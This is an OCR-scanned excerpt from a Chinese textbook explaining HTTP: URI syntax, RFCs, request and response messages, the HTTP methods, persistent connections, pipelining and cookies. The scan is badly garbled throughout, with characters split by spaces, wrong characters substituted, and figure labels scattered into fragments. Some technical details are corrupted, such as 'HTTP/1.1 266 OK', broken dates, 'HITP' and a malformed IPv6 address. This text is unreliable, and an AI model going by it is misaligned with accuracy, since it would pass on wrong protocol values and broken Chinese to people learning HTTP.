资源 的 定义 是 “可 标识 的 任何 东西 >。 除了 文档 文件 、 图 像 或 服务 〈 例 
如 当天 的 天 气 预 报 ) 等 能 够 区 别 于 其 他 类 型 的 ， 全 都 可 作为 资源 。 另 
外 ， 资 源 不 仅 可 以 是 单一 的 ， 也 可 以 是 多 数 的 集合 体 。 

Identifier 

表示 可 标识 的 对 象 。 也 称 为 标识 符 。 


综 上 所 述 ，URI 就 是 由 茶 个 协议 方案 表示 的 资源 的 定位 标识 符 。 协 议 
方案 是 指 访问 资源 所 使 用 的 协议 类 型 名 称 。 


采用 HTTP 协议 时 ， 协 议 方案 束 是 http。 除 此 之 外 ， 还 有 即 、 
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mailto、telnet、file 等 。 标 准 的 URI 协议 方案 有 30 种 左右 ， 由 隶属 于 
际 互 联网 资源 管理 的 非 营 利 社团 ICANN (Internet Corporation for 
Assigned Names and Numbers， 互 联网 名 称 与 数字 地 址 分 配 机 构 ) 的 
IANA (Internet Assigned Numbers Authority， 互 联网 号 码 分 配 局 ) 管理 
颁布 。 


。IANA - Uniform Resource Identifier (URD SCHEMES (统一 资源 
标识 符 方案 ) 





http://www.iana.org/assignments/uri-schemes 


URI 用 字符 串 标识 菜 一 互联 网 资源 ， 而 URL 表示 资 源 的 地 点 (互联 
网 上 所 处 的 位 置 ) 。 可 见 URL 是 URI 的 子 集 。 


“RFC3986: 统一 资源 标识 符 (URI) 通用 语法 ”中 列举 了 几 种 URI 例 
子 ， 如 下 所 示 。 





ftp://ftp.is.co.za/rfc/rfc1888.txt 
http://www.ietf.org/rfc/rfc2396.txt 
ldap://[28861:db8::7]/c=GB?objectClass?one 
mailto:John.Doe@Qexample.com 


news:comp.infosystems .www.servers.unix 
tel:+1-816-555-1212 

telnet://192.60.2.16:806/ 
urn:oasis:names:specification:docbook:dtd:xml:4.1.2 








本 书 接 下 来 的 章节 中 会 频繁 出 现 URI 这 个 术语 ， 在 充分 理解 的 基础 
上 ， 也 可 用 URL 替换 URI。 





1.7.2 ”URI 格式 

表示 指定 的 URI， 要 使 用 涵盖 全 部 必要 信息 的 绝对 URI、 绝 对 URL 以 
及 相对 URL。 相 对 URL， 是 指 从 浏览 器 中 基本 URI 处 指定 的 URL， 
形 如 /image/logo.gif。 


让 我 们 先 来 了 解 一 下 绝对 URI 的 格式 。 
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http:Wuserpass@www.example.jp:80/diwindex.htm?uid=1#ch 1 








协议 ”登录 信息 服务 器 地 址 带 层次 的 文件 路 径 | 片段 标识 符 
方案 名 { 认证 ) 服务 器 端口 号 查询 字符 串 


使 用 http: 或 https: 等 协议 方案 名 获取 访问 资源 时 要 指定 协议 类 型 。 不 
区 分 字母 大 小 写 ， 最 后 附 一 个 冒号 (:) 。 


也 可 使 用 data: 或 javascript: 这 类 指定 数据 或 脚本 程序 的 方案 名 。 
登录 信息 (认证 》 


指定 用 户 名 和 密码 作为 从 服务 器 并 获取 资源 时 必要 的 登录 信息 (里 份 
认证 ) 。 此 项 是 可 选项 。 


服务 器 地 址 

使 用 绝对 URI 必须 指定 待 访问 的 服务 嚣 地址。 地址 可 以 是 类 似 
hackrjp 这 种 DNS 可 解析 的 名 称 ， 或 是 192.168.1.1 这 类 IPv4 地 址 
名 ， 还 可 以 是 [0:0:0:0:0:0:0:1] 这 样 用 方 括号 括 起 来 的 IPv6 地 址 名 。 
服务 器 端口 号 


指定 服务 器 连接 的 网 络 端口 号 。 此 项 也 是 可 选项 ， 奢 用户 省 略 则 自动 
使 用 默认 端口 号 。 


带 层次 的 文件 路 径 


指定 服务 咒 上 的 文件 路 径 来 定位 特 指 的 资源 。 这 与 UNIX 系统 的 文件 
目录 结构 相似 。 


查询 字符 串 

针对 已 指定 的 文件 路 径 内 的 资源 ， 可 以 使 用 查询 字符 串 传 入 任意 参 
数 。 此 项 可 选 。 

片段 标识 符 

使 用 片段 标识 符 通 种 可 标记 出 已 获取 资源 中 的 子 资 源 《〈 文 档 内 的 茶 个 


0 
项 。 
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并 不 是 所 有 的 应 用 程序 都 符合 RFC 


有 一 些 用 来 制定 HTTP 协议 技术 标准 的 文档 ， 它 们 被 称 为 
RFC 〈Request for Comments， 征 求 修 正 意见 书 ) 。 


通常 ， 应 用 程序 会 遵照 由 RFC 确定 的 标准 实现 。 可 以 说 ，RFC 是 
互联 网 的 设计 文档 ， 要 是 不 按照 RFC 标准 执行 ， 就 有 可 能 导致 无 
法 通信 的 状况 。 比 如 ， 有 一 台 Web 服务 器 内 的 应 用 服务 没有 遵照 
ee 的 标准 实现 ， 那 Web 浏览 器 就 很 可 能 无 法 访问 这 台 服 务 器 





由 于 不 遵照 RFC 标准 实现 就 无 法 进行 HTTP 协议 通信 ， 所 以 基本 
上 客户 端 和 服务 器 端 都 会 以 RFC 为 标准 来 实现 HITP 协议 。 但 也 
存在 某 些 应 用 程序 因 客 户 端 或 服务 器 端的 不 同 ， 而 未 遵照 RFC 标 
准 ， 反 而 将 自 成 一 套 的 “标准 ”扩展 的 情况 。 


不 按 RFC 标准 来 实现 ， 当 然 也 不 必 劳 心 费力 让 自己 的 “标准 ”符合 
其 他 所 有 的 客户 端 和 服务 器 器。 但 设想 一 下 ， 如 果 这 区 应 用 程序 的 
使 用 者 非常 多 ， 那 会 发 生 什 么 情况 ? 不 难 想象 ， 其 他 的 客户 站 或 服 
务 句 端 必然 都 不 得 不 去 配合 它 。 


实际 在 互联 网 上 ， 已 经 实现 了 HTTP 协议 的 一 些 服 务 器 端 和 客户 端 
二 说 不 定 它 们 会 与 本 书 介绍 的 HITP 协议 的 实现 
情况 不 一 样 。 


本 书 接 下 来 要 介绍 的 HTTP 协议 内 容 ， 除 去 部 分 例外 ， 基 本 上 都 以 
RFC 的 标准 为 准 。 
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第 2 章 傈 单 的 HTTP 协议 


本 章 将 针对 HTTP 协议 结构 进行 讲解 ， 主 要 使 用 HTTP/1.1 版 本 。 学 完 
这 章 ， 想 必 大 家 就 能 理解 HTTP 协议 的 基础 了 。 


7 EF 





pg 
2.1 HTTP 协议 用 于 铭 户 器 和 服务 占 端 之 间 


的 通信 


HTTP 协议 和 TCP/P 协议 族 内 的 其 他 众多 的 协议 相同 ， 用 于 客户 端 和 
服务 器 之 间 的 通信 。 


请 求 访问 文本 或 图 像 等 资源 的 一 端 称 为 客户 端 ， 而 提供 资源 啊 应 的 一 
端 称 为 服务 器 端 。 
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图 : 应 用 HTTP 协议 时 ， 必 定 是 一 端 担任 客户 端 角 色 ， 另 一 端 担 
任 服务 器 端 角色 


在 两 台 计 算 机 之 间 使 用 HTTP 协议 通信 时 ， 在 一 条 通信 线路 上 必定 有 
一 疹 是 客户 端 ， 夯 一 端 则 是 服务 器 端 。 

有 时 候 ， 按 实际 情况 ， 两 台 计 算 机 作为 客户 端 和 服务 器 端的 角色 有 可 
能 会 互 换 。 但 就 仪 从 一 条 通信 路 线 来 说 ， 服 务 器 端 和 客户 并 的 角色 是 
确定 的 ， 而 用 HTTP 协议 能 够 明确 区 分 哪 端 是 客户 端 ， 哪 端 是 服务 器 
端 。 


2.2 ”通过 请 求 和 啊 应 的 交换 达成 通信 








图 : 请 求 必 定 由 客户 器 发 出 ， 而 服务 器 端 回复 啊 应 


HITP 协议 规定 ， 请 求 从 客户 端 发 出 ， 最 后 服务 需 端 啊 应 该 请 求 并 返 
回 。 换 句 话 说 ， 肯 定 是 先 从 客户 并 开始 建 并 通信 的 ， 服 务 器 并 在 没有 
接收 到 请 求 之 前 不 会 发 送 啊 应 。 


下 和 面 ， 我 们 来 看 一 个 上 其 体 的 示例 。 


发送 请 求 
GET / HTTP/1.1 
Host: hackr.jp 

dN 





客户 端 服务 器 习 发 送 响应 
HTTP/1.1 200 OK 
Date: Tue, 10 Jul 2012 06:50:15 GMT 
Content-Length: 362 
Content-Type: text/html 
<html> 


下 面 则 是 从 客户 端 发 送 给 某 个 HTTP 服务 器 端的 请 求 报 文中 的 内 容 。 


GET /index.htm HTTP/1.1 
Host: hackr.jp 





起 始 行 开 涉 的 GET 表 示 请 求 访 问 服务 器 的 类 型 ， 称 为 方法 

(method) 。 随 后 的 字符 串 /index.htm 指明 了 请 求 访问 的 资源 对 象 ， 
也 叫做 请 求 URI (requestrURI) 。 最 后 的 HITP/1.1， 即 HTTP 的 版 本 
写 ， 用 来 提示 客户 端 使 用 的 HITP 协议 功能 。 


综合 来 看 ， 这 上段 请 求 内 容 的 意思 是 : 请 求 访问 某 台 HTTP 服务 器 上 的 
/index.htm 页 面 资 源 。 


请 求 报 文 是 由 请 求 方法 、 请 求 URI、 协 议 版 本 、 可 选 的 请 求 首部 字段 
和 内 容 实体 构成 的 。 
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方法 URI 协议 版 本 


POST /form/entry PTPAIETL i 


Host: hackr.jp 

Connection: keep-alive 

Content-Type: application/x-www-form-urlencoded 
Content-Length: 16 


name=ueno&age=37 





图 : 请 求 报 文 的 构成 


请 求 首部 字段 及 内 容 实体 稍 后 会 作 详细 说 明 。 接 下 来 ， 我 们 继续 讲 
解 。 接 收 到 请 求 的 服务 器 ， 会 将 请 求 内 容 的 处 理 结果 以 响应 的 形式 返 
回 。 


HTTP/1.1 266 OK 
Date: Tue，16 Jul 20612 66:56:15 GMT 
Content-Length: 362 


Content-Type: text/html 





在 起 始 行 开头 的 HTTP/1.1 表示 服务 器 对 应 的 HTTP 版本。 


紧 换 着 的 200 OK 表示 请 求 的 处 理 结果 的 状态 码 (status code) 和 原因 
短语 〈Treason-phrase) 。 下 一 行 显示 了 创建 响应 的 日 期 时 间 ， 是 首部 
字段 (header field) 内 的 一 个 属性 。 


接着 以 一 空 行 分 隅 ， 之 后 的 内 容 称 为 资源 实体 的 主体 (entity 
body) 。 


啊 应 报 文 基本 上 由 协议 版 本 、 状 态 码 (表示 请 求 成 功 或 失败 的 数字 代 
码 ) 、 用 以 解释 状态 码 的 原因 短语 、 可 选 的 响应 首部 字段 以 及 实体 主 
体 构成 。 稍 后 我 们 会 对 这 些 内 容 进行 详细 说 明 。 
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状态 码 的 原因 短语 
协议 版 本 状态 码 
7 响应 首部 字段 
ELEPE/ I [260 [Gx 


Date: Tue 10 Jul 2012 06:50:15 GMT 
Content-Length: 362 
Content-Type: text/html 


<html> 


主体 
图 : 啊 应 报 文 的 构成 


2.3 HTTP 是 不 保存 状态 的 协议 


HTTP 是 一 种 不 保存 状态 ， 即 无 状态 (stateless〉 协议 。HTTP 协议 目 





号 不 对 请 求 和 啊 应 之 间 的 通信 状态 进行 保存 。 也 惑 是 说 在 HTTP 这 个 
级 别 ， 协 议 对 于 发 送 过 的 请 求 或 啊 应 都 不 做 持久 化 处 理 。 











你 之 前 发 送 了 什么 
给 我 来 着 ? 





我 想 想 ， 之 章 发 送 了 
什么 给 你 来 着 ? 





图 : HTTP 协议 上 自身 不 具备 保存 之 前 发 送 过 的 请 求 或 啊 应 的 功能 


使 用 HITP 协议 ， 每 当 有 新 的 请 求 发 送 时 ， 束 会 有 对 应 的 新 啊 应 产 
生 。 协 议 本 号 并 不 保留 之 前 一 切 的 请 求 或 啊 应 报 文 的 信息 。 这 和 是 为 了 
更 快 地 处 理 大 量 事务 ， 确 保 协议 的 可 伸缩 性 ， 而 特意 把 HITP 协议 设 
计 成 如 此 简单 的 。 


可 是 ， 随 者 Web 的 不 断 发 展 ， 因 无 状态 而 导致 业务 处 理 变 得 丽 手 的 
情况 增多 了 。 比 如 ， 用 户 登 录 到 一 家 购物 网 站 ， 即 使 他 跳 转 到 该 站 的 
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其 他 页 面 后 ， 也 需要 能 继续 保持 登录 状态 。 针 对 这 个 实例 ， 网 站 为 了 
能 够 区 所 是 淮 送 出 的 请 求 ， 需要 保存 用 户 的 状态 。 


HTTP/1.1 虽然 是 无 状态 协议 ， 但 为 了 实现 期 望 的 保持 状态 功能 ， 于 


是 引入 了 Cookie 技术 。 有 了 Cookie 再 用 HTTP 协议 通信 ， 就 可 以 管 
理 状态 了 。 有 关 Cookie 的 详细 内 容 稍 后 讲解 。 


2.4 请 求 URI 定位 资源 


HTTP 协议 使 用 URI 定位 互联 网 上 的 资源 。 正 是 因为 URI 的 特定 功 
能 ， 在 互联 网 上 任意 位 置 的 资源 都 能 访问 到 。 





URI a 
http://Wwww.usagidesign.jp/photo/usagiihtm 


URI 


0 = 多 














URI 
http://www.example.com/auth/index.htm 








图 : HTTP 协议 使 用 URI 让 客户 端 定 位 到 资源 


当 客 户 端 请 求 访 问 资 源 而 发 送 请 求 时 ，URI 需要 将 作为 请 求 报 文中 的 
请 求 URI 包含 在 内 。 指 定 请 求 URI 的 方式 有 很 多 。 
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* URI 为 完整 的 请 求 URI 


GET MEEB /Naokr Tp Index. htm HEEBP/1,1 
请 求 URI 


:在 首部 字段 Host 中 写 明 网 络 域名 或 IP 地 址 


GET /index.htm HITP/1.1 
Host: hackr.jp 


图 : 以 http://hackr.jp/index.htm 作为 请 求 的 例子 
除 此 之 外 ， 如 果 不 是 访问 特定 资源 而 是 对 服务 器 本 和 丑 发 起 请 求 ， 可 以 


用 一 个 * 来 代替 请 求 URI。 下 面 这 个 例子 是 查询 HTTP 服务 器 端 支 持 
的 HITP 方法 种 类 。 


OPTIONS * HTTP/1.1 


2.5 ”告知 服务 器 意图 的 HTTP 方法 
下 面 ， 我 们 介绍 HTTP/1.1 中 可 使 用 的 方法 。 


GET : 获取 资源 


GET 方法 用 来 请 求 访 问 已 被 URI 识别 的 资源 。 指 定 的 资源 经 服务 占 
端 解析 后 返回 响应 内 容 。 也 就 是 说 ， 如 果 请 求 的 资源 是 文本 ， 那 就 保 
持原 样 返回 ; le et tn li 
口 ) 那样 的 程序 ， 则 返回 经 过 执行 后 的 输出 结果 。 











使 用 GET 方法 的 请 求 ' 啊 应 的 例子 
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请求 GET /index.html HTTP/1.1 
本 Host: www.hackrjp 


向 应 | 返回 index.html 的 页 面 资源 








GET /index.html HTTP/1.1 
Host: www.hackrjp 
If-Modified-Since: Thu, 12 Jul 2012 07:30:00 GMT 


仅 返 回 2012 年 7 月 12 日 7 点 30 分 以 后 更 新 过 的 index.html 页 面 资源 。 如 果 未 
有 内 容 更 新 ， 则 以 状态 码 304 Not Modified 作 为 响应 返回 
































POST: 传输 实体 主体 
POST 方法 用 来 传输 实体 的 主体 。 
虽然 用 GET 方法 也 可 以 传输 实体 的 主体 ， 但 一 般 不 用 GET 方法 进行 


传输 ， 而 是 用 POST 方法 。 虽 说 POST 的 功能 与 GET 很 相似 ， 但 
POST 的 主要 目的 并 不 是 获取 响应 的 主体 内 容 。 





客户 端 
使 用 POST 方法 的 请 求 ' 啊 应 的 例子 


POST /submit.cgi HTTP/1.1 
Host: www.hackrjp 





Content-Length: 1560 (1560 字 节 的 数据 ) 























submit.cgi 接收 数据 的 处 到 











PUT: 传输 文件 


PUT 方法 用 来 传输 文件 。 就 像 FTP 协议 的 文件 上 传 一 样 ， 要 求 在 请 
求 报 文 的 主体 中 包含 文件 内 容 ， 然 后 保存 到 请 求 URI 指定 的 位 置 。 
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但 是 ， 鉴 于 HITP/1.1 的 PUT 方法 自身 不 带 验 证 机 制 ， 任 何人 都 可 以 
上 传 文件 , 存在 安全 性 问题 ， 因 此 一 般 的 Web 网 站 不 使 用 访 方 法 。 知 
配合 Web 应 用 程序 的 验证 机 制 ， 或 架构 设计 采用 

REST (REpresentational State Transfer， 表 征 状态 转移 ) 标准 的 同类 
Web 网 站 ， 就 可 能 会 开放 使 用 PUT 方法 。 








我 村 翅 这 份 
文件 传 给 你 ! 





文件 





使 用 PUT 方法 的 请 求 :响应 的 例子 


PUT /example.html HTTP/1.1 
清 求 Host www.hackrjp 
Content-Type: text/html 
Content-Length: 1560 (1560 字 节 的 数据 ) 
人 





响应 返回 状态 码 204 No Content 〈 比 如 : 该 html 已 存在 于 服务 器 上 ) 








1 响应 的 意思 其 实 是 请 求 执 行 成 功 了 ， 但 无 数据 返回 。 一 一 译 者 注 





HEAD: 获得 报 文 首部 


HEAD 方法 和 GET 方法 一 样 ， 只 是 不 返回 报 文 主体 部 分 。 用 于 确认 
URI 的 有 效 性 及 资源 更 新 的 日 期 时 间 等 。 






把 那个 的 相关 
信息 告诉 我 ! 









图 : 和 GET 一 样 ， 但 不 返回 报 文 主体 
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使 用 HEAD 方法 的 请 求 ' 啊 应 的 例子 


请 求 HEAD mndex.html HTTP/1.1 
坦 Host www.hackrjp 








返回 index html 有 关 的 响应 首部 
DELETE: 删除 文件 


DELETE 方法 用 来 删除 文件 ， 是 与 PUT 相反 的 方法 。DELETE 方法 按 
请 求 URI 删除 指定 的 资源 。 


但 是 ，HTTP/1.1 的 DELETE 方法 本 身 和 了 PUT 方法 一 样 不 带 验证 机 
制 ， 所 以 一 般 的 Web 网 站 也 不 使 用 DELETE 方法 。 当 配合 Web 应 用 
程序 的 验证 机 制 ， 或 遵守 REST 标准 时 还 是 有 可 能 会 开放 使 用 的 。 


快 把 那 份 文件 
册 | 掉 吧 ~ 





啊 应 返回 状态 码 204 No Content〈 比 如 : 该 html 已 从 该 服务 器 上 删除 ) 


OPTIONS: 询问 支持 的 方法 
OPTIONS 方法 用 来 查询 针对 请 求 URI 指定 的 资源 支持 的 方法 。 







支持 GET 所 0 








你 支持 哪些 方法 ? 
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使 用 OPTIONS 方法 的 请 求 : 响 应 的 例子 


请 求 OPTIONS * HTTP/1.1 
喝 Host: www.hackrjp 


HTTP/1.1 200 OK 
Alow: GET POST HEAD, OPTIONS 
《返回 服务 器 支持 的 方法 ) 








TRACE: 追踪 路 径 


TRACE 方法 是 让 Web 服务 器 端 将 之 前 的 请 求 通信 环 回 给 客户 端的 方 


发 送 请 求 时 ， 在 Max-Forwards 首部 字段 中 填 入 数值 ， 每 经 过 一 个 服 
务 嚣 端 就 将 该 数字 减 1， 当 数值 刚好 减 到 0 时， 就 停止 继续 传输 ， 最 
后 接收 到 请 求 的 服务 器 端 则 返回 状态 码 200 OK 的 啊 应 。 

客户 端 通过 TRACE 方法 可 以 查询 发 送出 去 的 请 求 是 怎样 被 加 工 修改 


/ 算 改 的 。 这 是 因为 ， 请 求 想 要 连接 到 源 目 标 服务 句 可 能 会 通过 代理 
中 转 ，TRACE 方法 就 是 用 来 确认 连接 过 程 中 发 生 的 一 系列 操作 。 


但 是 ，TRACE 方法 本 来 就 不 怎么 党 用， 再 加 上 它 容易 引发 
XST (Cross-Site Tracing， 跨 站 追踪 ) 攻击 ， 通 党 就 更 不 会 用 到 了 。 
































之 后 将 会 发 生 些 从 代理 服务 器 路 由 中 转 时 请 求 我 收 到 的 是 
什么 呢 ? 可 能 被 算 改 这 样 则 请求 


> 
BY 
2 


客户 端 代理 服务 器 代理 服务 器 服务 器 


使 用 TRACE 方法 的 请 求 : 啊 应 的 例子 


TRACE / HTTP/1.1 
请 求 Host: hackr.jp 


Max-Forwards: 2 


HTTP/1.1 200 OK 
Content-Type: message/http 
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响应 Content-Length: 1024 


TRACE / HTTP/1.1 
Host: hackr.jp 
Max-Forwards:2( 返 回 啊 应 包含 请 求 内 容 ) 








CONNECT: 要 求 用 隧道 协议 连接 代理 

CONNECT 方法 要 求 在 与 代理 服务 器 通信 时 建立 隧道 ， 实 现 用 隧道 协 
议 进行 TCP 通信 。 主 要 使 用 SSL (Secure Sockets Layer， 安 全 套 接 
层 ) 和 TLS (Transport Layer Security， 传 输 层 安全 ) 协议 把 通信 内 容 
加 密 后 经 网 络 隧道 传输 。 

CONNECT 方法 的 格式 如 下 所 示 。 


CONNECT 代理 服务 器 名 :端口 号 HTTP 版 本 


让 我 通过 
TY 











客户 端 代理 服务 器 服务 器 
使 用 CONNECT 方法 的 请 求 :响应 的 例子 


请 求 CONNECT proxy.hackrjp:8080 HTTP/1.1 
人 Host: proxy.hackrjp 





HTTP/1.1 200 OK 〈 之 后 进入 网 络 隧道 ) 


2.6 ”使 用 方法 下 达 命 令 
向 请 求 URI 指定 的 资源 发 送 请 求 报 文 时， 采用 称 为 方法 的 命令 。 


方法 的 作用 在 于 ， 可 以 指定 请 求 的 资源 按期 望 产生 茶 种 行为 。 方 法 中 
有 GET、POST 和 HEAD 等 。 
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下 表 列 出 了 HTTP/1.0 和 HTTP/1.1 支持 的 方法 。 另 外 ， 方 法 名 区 分 大 








我 发 文件 过 来 足 





HEAD 方 注 
告诉 我 通信 状态 


客户 端 


小 写 ， 注 意 要 用 大 写字 和 母 。 


表 2-1: HTTP/1.0 和 HTTP/1.1 支持 的 方法 


在 这 里 列举 的 众多 方法 中 ，LINK 和 UNLINK 已 被 HITP/1.1 废弃 ， 不 





or 








CE TE 
PUT 。 
DEL 


OPTIONS | 二 交 8 Es 


1. 

1. 

1. 

LINK 建立 和 资源 之 间 的 联系 1. 


1 
1 
0 


再 支持 。 
2.7 持久 连接 节省 通信 量 


HTTP 协议 的 初始 版 本 中 ， 每 进行 一 次 HTTP 通信 就 要 断 开 一 次 TCP 


连接 


O 





建立 TCP 连接 


ee OY N/ACK 


断 开 TCP 连接 


以 当年 的 通信 情况 来 说 ， 因 为 都 是 些 容 量 很 小 的 文本 传输 ， 所 以 即使 
这 样 也 没有 多 大 问题 。 可 随 着 HTTP 的 普及 ， 文 档 中 包含 大 量 图 片 的 
情况 多 了 起 来 。 

比如 ， 使 用 浏览 费 浏 览 一 个 包含 多 张 图 片 的 HTML 页 面 时 ， 在 发 送 
请 求 访问 HTML 页 面 资 源 的 同时 ， 也 会 请 求 该 HTML 页 面 里 包含 的 
其 他 资源 。 因 此 ， 每 次 的 请 求 都 会 造成 无 请 的 TCP 连接 建立 和 断 
开 ， 增 加 通信 量 的 开销 。 
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发 送 请 求 一 份 包含 多 张 图 
片 的 HTML 文 档 对 应 的 


Web 页 面 , 会 产生 大 量 的 
通信 开销 。 





获取 HTML 文档 






建立 TCP 连 接 
HTTP 请 求 /响应 


2.7.1 持久 连接 


为 解决 上 述 TCP 连接 的 问题 ，HTTP/1.1 和 一 部 分 的 HTTP/1.0 想 出 了 
持久 连接 (HTTP Persistent Connections， 也 称 为 HITP keep-alive 或 
HTTP connection reuse ) 的 方法 。 持 入 连接 的 特点 是 ， 只 要 任意 一 端 
没有 明确 提出 断 开 连接 ， 则 保持 TCP 连接 状态 。 
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建立 TCP 连 接 





一 SY 一 
i———= SYN/ACK 

web 页 面 的 打开 ACK——————* 

速度 变 快 3! HTTP 请 求 一 一人 
= HTTP 响 应 

HTTP 请 求 >》 
ee HT TPO) Ry 








日 村 建立 这 接 就 能 
一 况 性 发 送 请 求 曲 





断 开 TCP 连 接 | 








图 : 持久 连接 由 在 建立 1 次 TCP 连接 后 进行 多 次 请 求 和 响应 的 交 
五 





持久 连接 的 好 处 在 于 减少 了 TCP 连接 的 重复 建立 和 断 开 所 造成 的 额 
外 开销 ， 减 轻 了 服务 器 端的 负载 。 另 外 ， 减 少 开销 的 那 部 分 时 间 ， 使 
和 
立 提 高 


在 HITP/1.1 中 ， 所 有 的 连接 默认 都 是 持久 连接 ， 但 在 HTTP/1.0 内 并 
未 标准 化 。 虽 然 有 一 部 分 服务 器 通过 非 标准 的 手段 实现 了 持久 连接 ， 
但 服务 器 端 不 一 定 能 够 支持 持久 连接 。 毫 无 疑问 ， 除 了 服务 器 端 ， 客 
户 端 也 需要 支持 持久 连接 。 


2.7.2 ”管线 化 
持久 连接 使 得 多 数 请 求 以 管线 化 (pipelining)〉 方式 发 送 成 为 可 能 。 从 


前 发 送 请 求 后 需 等 待 并 收 到 响应 ， 才 能 发 送 下 一 个 请 求 。 管 线 化 技术 
出 现 后 ， 不 用 等 待 响应 亦 可 直接 发 送 下 一 个 请 求 。 
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这 样 就 能 够 做 到 同时 并 行 发 送 多 个 请 求 ， 而 不 需要 一 个 接 一 个 地 等 符 
啊 应 了 。 






不 用 等 待 就 能 直接 
发 送 下 一 个 请 求 ! 






建立 TCP 连 接 
人 We 一 一 全 
二 | (DD 
二 HTTP 响应 (2) 


图 : 不 等 待 响应 ， 直 接 发 送 下 一 个 请 求 


比如 ， 当 请 求 一 个 包含 10 张 图 片 的 HTML Web 页 面 ， 与 换个 连接 相 
比 ， 用 持久 连接 可 以 让 请 求 更 快 结束 。 而 管线 化 技术 则 比 持久 连接 还 
要 快 。 请 求 数 越 多 ， 时 间 差 就 越 明 显 。 


2.8 ”使 用 Cookie 的 状态 管理 


HTTP 是 无 状态 协议 ， 它 不 对 之 前 发 生 过 的 请 求 和 响应 的 状态 进行 管 
理 。 也 就 是 说 ， 无 法 根据 之 前 的 状态 进行 本 次 的 请 求 处 理 。 


假设 要 求 登录 认证 的 Web 页 面 本 身 无 法 进行 状态 的 管理 《不 记录 已 
登录 的 状态 ) ， 那 么 每 次 跳 转 新 页 面 不 是 要 再 次 登录 ， 就 是 要 在 每 次 
请 求 报 文 中 附加 参数 来 管理 登录 状态 。 


不 可 否认 ， 无 状态 协议 当然 也 有 它 的 优点 。 由 于 不 必 保存 状态 ， 目 然 
可 减少 服务 器 的 CPU 及 内 存 资 源 的 消耗 。 从 男 一 侧面 来 说 ， 也 正 是 
因为 HTTP 协议 本 里 是 非常 简单 的 ， 所 以 才 会 被 应 用 在 各 种 场景 里 。 
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让 我 一 一 记 住 你 
们 ， 我 曲 身 体 可 


吃 不 消 啊 





图 : 如 果 让 服务 器 管理 全 部 客户 端 状 态 则 会 成 为 负担 


保留 无 状态 协议 这 个 特征 的 同时 又 要 解决 类 似 的 矛盾 问题 ， 于 是 引入 
了 Cookie 技术 。Cookie 技术 通过 在 请 求 和 啊 应 报 文中 写 入 Cookie 信 
居 来 控制 客户 端的 状态 。 


Cookie 会 根据 从 服务 器 端 发 送 的 啊 应 报 文 内 的 一 个 叫做 Set-Cookie 的 
首部 字段 信息 ， 通 知客 户 端 保存 Cookie。 当 下 次 客户 端 再 往 该 服务 器 
容 户 问 会 目 动 在 请 求 报 文中 加 入 Cookie 值 后 发 送出 











服务 器 端 发 现 客户 端 发 送 过 来 的 Cookie 后 ， 会 去 检查 究竟 是 从 哪 一 
UT. 然后 对 比 服 务 器 上 的 记录 ， 最 后 得 到 之 前 
状态 信息 。 


。 没有 Cookie 信息 状态 下 的 请 求 








生成 Cookie 
人 保存 请 求 记 住 是 向 谁 发 送 的 


请 求 一 一 (1 









2) 在 响应 中 添加 Cookie 后 返回 
一 响应 


加 


客户 端 


保存 Cookie 服务 器 
Cookie 
Cookie 
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e。 第 2 次 以 后 〈 存 有 Cookie 信息 状态 ) 的 请 求 


4 检查 Cookie 


3) 请 求 中 添加 Cookie 后 发 送 
请 求 一 人 


Cookie 








o 叶 ， 旦 刚才 曲 
那 家 化 








ee 
容 如 下 。 


1. 请 求 报 文 (没有 Cookie 信息 的 状态 ) 
GET /reader/ HTTP/1.1 


Host: hackr.jp 
* 首 部 字段 内 没有 Cookie 的 相关 信息 





2. 啊 应 报 文 (服务 器 端 生 成 Cookie 信息 ) 


HTTP/1.1 266 OK 

Date: Thu, 12 Jul 2612 67:12:26 GMT 

Server: Apache 

~<Set-Cookie: sid=1342677146226724; path=/; explires=Wed ， 
10-0ct-12 67:12:26 GMT> 

Content -Type: text/plain; charset=UTF-8 








3. 请 求 报 文 〈 目 动 发 送 保存 着 的 Cookie 信息 ) 


GET /image/ HTTP/1.1 


Host: hackr.jp 
Cookie: Sid=1342677146226724 








有 关 请 求 报 文 和 响应 报 文 内 Cookie 对 应 的 首部 字段 ， 请 参考 之 后 
的 革 市 。 
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第 3 章 HTTP 报 文 内 的 HTTP 
言 自 


DA 


了 


HTTP 通信 过 程 包 括 从 客户 端 发 往 服 务 器 端的 请 求 及 从 服务 器 端 返 回 
客户 端的 响应 。 本 章 就 让 我 们 来 了 解 一 下 请 求 和 响应 是 怎样 运作 的 。 











3.1 HTTP 报 文 
用 于 HTTP 协议 交互 的 信息 被 称 为 HITP 报 文 。 请 求 端 〈 客 户 端 ) 的 





HTTP 报 文 叫做 请 求 报 文 ， 啊 应 端 〈 服 务 器 端 ) 的 叫做 啊 应 报 文 。 
En 行 符 ) 数据 构成 的 字符 串 文 


HTTP 报 文 大 致 可 分 为 报 文 首部 和 报 文 主体 两 块 。 两 者 由 最 初出 现 的 
空 行 CCR+LF) 来 划分 。 通 常 ， 并 不 一 定 要 有 报 文 主体 。 
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【 报 文 首部 】 
服务 器 端 或 客户 端 需 处 理 的 请 求 或 响应 的 内 容 及 属性 


【CRA+LF 】 
CR{ Carriage Return,， 回 车 符 ，16 进 制 0x0d } 和 
LF{ Line Feed, 换行 符 : 16 进 制 0x0a ) 


【 报 文 主体 】 
应 被 发 送 的 数据 





图 : HTTP 报 文 的 结构 
3.2 ”请 求 报 文 及 啊 应 报 文 的 结构 
我 们 来 看 一 下 请 求 报 文 和 响应 报 文 的 结构 。 


报 文 首部 请 求 首部 字段 


网 通用 首部 字段 
So 实体 首部 字段 
他 | 





图 : 请 求 报 文 (上 〉 和 啊 应 报 文 (下) 的 结构 
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GET7AHTTPA .1 丰 


Host: hackr. jp 

User-agent: Mozilla/5.0 (Windows NT 6.1; WOW64; ry:13.0) Gecko/20100101 Firefox/13.0.1 
Accept: text/html ,application/xhtml+xml ,application/xml;q=0.9,*/*;q=0.8 
Accept -Language: ja,en-us;:q=0.7,en;q=0.3 

Accept -Encoding: gzip, deflate 

DNT: 1 

Connection: keep-alive 

Pragma: no-cache 

Cache-Control: no-cache 各 种 首部 字段 


HTTP/1.1 200 OK 


Date: Fri, 13 Jul 2012 02:45:26 GMT 

Server: Apache 

Last-Modified: Fri, 31 Aug 2007 02:02:20 GMT 
ETag: "45bael-16a-46d776ac" 

Accept -Ranges: bytes 

Content-Length: 362 

Connection: close 


Content-Type: text/html 各 种 首部 字段 





图 : 请 求 报 文 (上 ) 和 响应 报 文 (下 ) 的 实例 


请 求 报 文 和 啊 应 报 文 的 首部 内 容 由 以 下 数据 组 成 。 现 在 出 现 的 各 种 首 
